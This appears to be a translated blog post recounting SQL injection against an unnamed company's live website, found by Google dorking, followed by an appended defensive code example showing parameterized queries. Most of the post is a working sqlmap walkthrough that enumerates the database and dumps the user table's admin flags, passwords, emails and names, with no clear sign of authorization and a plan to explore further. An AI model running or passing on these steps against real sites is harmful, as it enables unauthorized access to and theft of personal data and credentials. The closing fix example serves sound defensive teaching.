Record the SQL injection vulnerability of XX company
2022-07-29 05:42:00 【adeylinux】
In the morning, when I got up, a friend asked me to take part in public-welfare SRC. So I was dragged into exploring public-welfare SRC. I opened Google and searched for: inurl: Science and technology company. Then I opened a website. Browsing the site, I found ?id and, out of occupational habit, added a single quotation mark after ?id. The page changed. I guessed it was an XSS or SQL injection hole.
Start penetration testing .
Take out sqlmap and go all in.
python sqlmap.py -u "http://www.xxxxxxx.com/news.php?class="
Sure enough, there really is a flaw. Then continue to test:
python sqlmap.py -u "http://www.xxxxxxx.com/news.php?class=" --dbs
There are two databases here: bdm818993245_db, information_schema
Then go all in again.
python sqlmap.py -u "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db --tables
The bdm818993245_db database has 9 tables:
| user |
| gplat_book |
| gplat_news |
| gplat_newsclass |
| gplat_newsclass2 |
| href |
| job |
| job_add |
| lawyer_wenda |
Next, query the administrator and password under the user table.
python sqlmap.py -u "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db -T user --columns
The user table has the following 13 columns:
+-----------+---------------+
| Column | Type |
+-----------+---------------+
| adder | varchar(8) |
| admin | int(2) |
| email | varchar(60) |
| grade | varchar(12) |
| id | int(6) |
| image | varchar(70) |
| name | varchar(60) |
| pass | varchar(60) |
| phone | varchar(14) |
| qianming | varchar(100) |
| times | datetime |
| up_time | datetime |
| xingb | varchar(2) |
+-----------+---------------+
Next, query the admin and pass data under the user table:
python sqlmap.py -u "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db -T user -C admin,pass --dump
Next, collect the data of the database :
python sqlmap.py -u "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db -T user -C email --dump
Then collect data :
python sqlmap.py "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db -T user -C
Query the user name of the administrator :
python sqlmap.py -u "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db -T user -C name --dump
The collection is almost done . End the penetration test . I will study the rest of the databases, tables and columns slowly .
Summary:
For SQL injection, try to use manual injection, because when tools are run against a website, it's easy to jump.
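For the site owner, the page changing when a single quote is appended to the parameter is the signature of a query built by string concatenation. The following is an added example, not code from the original post or the affected site: it uses Python's sqlite3 as a stand-in for the site's PHP/MySQL stack, and the function names and table contents are constructed (only the table name gplat_news is taken from the listing above).

```python
import re
import sqlite3

def make_db():
    """Constructed sample data; only the table name comes from the post."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE gplat_news (id INTEGER PRIMARY KEY, class INTEGER, title TEXT);
        INSERT INTO gplat_news (class, title)
        VALUES (1, 'Company news'), (2, 'Industry news');
    """)
    return db

def news_vulnerable(db, class_param):
    """Flawed pattern: the raw parameter becomes part of the SQL text."""
    sql = "SELECT title FROM gplat_news WHERE class = " + class_param
    try:
        return [row[0] for row in db.execute(sql)]
    except sqlite3.Error as exc:
        # The input altered the statement's syntax, which is why the page
        # rendered differently once a quote was appended.
        return "SQL error: %s" % exc

def news_bound_only(db, class_param):
    """Binding alone: the value is compared as data, never parsed as SQL."""
    rows = db.execute("SELECT title FROM gplat_news WHERE class = ?",
                      (class_param,))
    return [row[0] for row in rows]

def news_hardened(db, class_param):
    """Type validation first, then a bound parameter."""
    if not re.fullmatch(r"[0-9]{1,6}", class_param):
        return []  # anything that is not a short decimal id is rejected
    rows = db.execute("SELECT title FROM gplat_news WHERE class = ?",
                      (int(class_param),))
    return [row[0] for row in rows]

if __name__ == "__main__":
    db = make_db()
    for value in ("1", "1'"):  # a normal id, then the id with a quote appended
        print(repr(value), "| vulnerable:", news_vulnerable(db, value),
              "| bound:", news_bound_only(db, value),
              "| hardened:", news_hardened(db, value))
```

In the PHP original the same two layers would be an integer check on the parameter and a prepared statement (PDO or mysqli) with the value bound rather than concatenated.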